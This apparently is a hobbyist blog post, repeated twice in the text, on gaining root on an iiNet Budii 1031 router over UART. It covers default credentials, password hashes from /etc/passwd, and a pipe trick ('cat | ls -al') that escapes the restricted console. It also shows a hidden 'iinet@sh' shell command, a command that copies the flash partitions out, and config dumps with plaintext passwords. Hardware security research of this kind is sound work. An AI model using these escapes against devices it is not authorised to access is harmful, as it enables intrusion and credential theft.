iiNet Budii(1031) (UART based privesc attacks)
Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout.
connecting to the uart and booting we can see the modem is running a broadcom firmware
[bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
**
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
**
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]
the user names available to us are:
(user:admin/password:admin)
(user:user/password:user)
upon logging in we are brought into a console(d), the commands available to admin are :
[?.samp]
help logout exit quit reboot adsl
xdslctl xtm brctl cat loglevel logdest
virtualserver ddns df dumpcfg dumpmdm meminfo
psp kill dnsproxy syslog echo ifconfig ping
ps pwd sntp sysinfo tftp voice
wlctl wifidefault arp defaultgateway dhcpserver dns
endbg dac3120_dbg cpld_led lan lanhosts passwd ppp
restoredefault route save swversion cfgupdate swupdate
exitOnIdle wan 7sl factoryrestore factorywifi sysreport
audiotest usbinfo zigbeetest stopzigbee initzigbee
The user account is slightly less privileged than the admin.
a quick cat of etc/passwd or var/passwd gives us:
[passwd]
admin:WjGFd46JWxdxE:0:0:Administrator:/:/bin/sh
support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh
iiNetBoB:75xVKjjtU6y5A:0:0:Administrator:/:/bin/sh
[/passwd]
the passwords are all UN=PW expect for iinetbob.(pword unknown)
Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..
We use a pipe | on cat or ping really anything will work at this point just that cat is cleaner
so we use :\
>cat | ls -al
Because the second command is not bound to console(d) we can use all of
the busy box/sh/ash command set but after the command we are returned to the console(d)
by inserting a usb into the internal port we can simply cp out the files we need
>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)
Looking into the console(d) routines and its links to {lib file:libcms_cli}
we find a table of hiddencmds
one of them more interesting than others:
>iinet@sh
this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.
the command can be used in both the user account and the admin account so if in theory the routers admin was locked we could use the user account and privesc commands to gain a high level access.
We are still very limited as too how far we can swing inside the commands as the smd and ssk respond to alot of the actions placed across the userland (telnet & ssh)
The config files can be dumped via >dumpmdm or dumpconfig
which will also dump the users and passwords with no encoding/hashes
<SoftwareVersion>Budii1031</SoftwareVersion>
<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion> <X_BROADCOM_COM_LoginCfg>
<AdminUserName>admin</AdminUserName>
<AdminPassword>admin</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<logintimeout>10</logintimeout>
</X_BROADCOM_COM_LoginCfg>
Till Next Time.
connecting to the uart and booting we can see the modem is running a broadcom firmware
[bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
**
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
**
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]
the user names available to us are:
(user:admin/password:admin)
(user:user/password:user)
upon logging in we are brought into a console(d), the commands available to admin are :
[?.samp]
help logout exit quit reboot adsl
xdslctl xtm brctl cat loglevel logdest
virtualserver ddns df dumpcfg dumpmdm meminfo
psp kill dnsproxy syslog echo ifconfig ping
ps pwd sntp sysinfo tftp voice
wlctl wifidefault arp defaultgateway dhcpserver dns
endbg dac3120_dbg cpld_led lan lanhosts passwd ppp
restoredefault route save swversion cfgupdate swupdate
exitOnIdle wan 7sl factoryrestore factorywifi sysreport
audiotest usbinfo zigbeetest stopzigbee initzigbee
[/?.samp]
The user account is slightly less privileged than the admin.
a quick cat of etc/passwd or var/passwd gives us:
[passwd]
admin:WjGFd46JWxdxE:0:0:Administrator:/:/bin/sh
support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh
iiNetBoB:75xVKjjtU6y5A:0:0:Administrator:/:/bin/sh
[/passwd]
the passwords are all UN=PW expect for iinetbob.(pword unknown)
Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..
We use a pipe | on cat or ping really anything will work at this point just that cat is cleaner
so we use :\
>cat | ls -al
Because the second command is not bound to console(d) we can use all of
the busy box/sh/ash command set but after the command we are returned to the console(d)
by inserting a usb into the internal port we can simply cp out the files we need
>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)
Looking into the console(d) routines and its links to {lib file:libcms_cli}
we find a table of hiddencmds
one of them more interesting than others:
# DATA XREF: .data:cliHiddenCmdTable o
>iinet@sh
this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.
the command can be used in both the user account and the admin account so if in theory the routers admin was locked we could use the user account and privesc commands to gain a high level access.
We are still very limited as too how far we can swing inside the commands as the smd and ssk respond to alot of the actions placed across the userland (telnet & ssh)
The config files can be dumped via >dumpmdm or dumpconfig
which will also dump the users and passwords with no encoding/hashes
<SoftwareVersion>Budii1031</SoftwareVersion>
<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion> <X_BROADCOM_COM_LoginCfg>
<AdminUserName>admin</AdminUserName>
<AdminPassword>admin</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<logintimeout>10</logintimeout>
</X_BROADCOM_COM_LoginCfg>
Till Next Time.
Comments
Post a Comment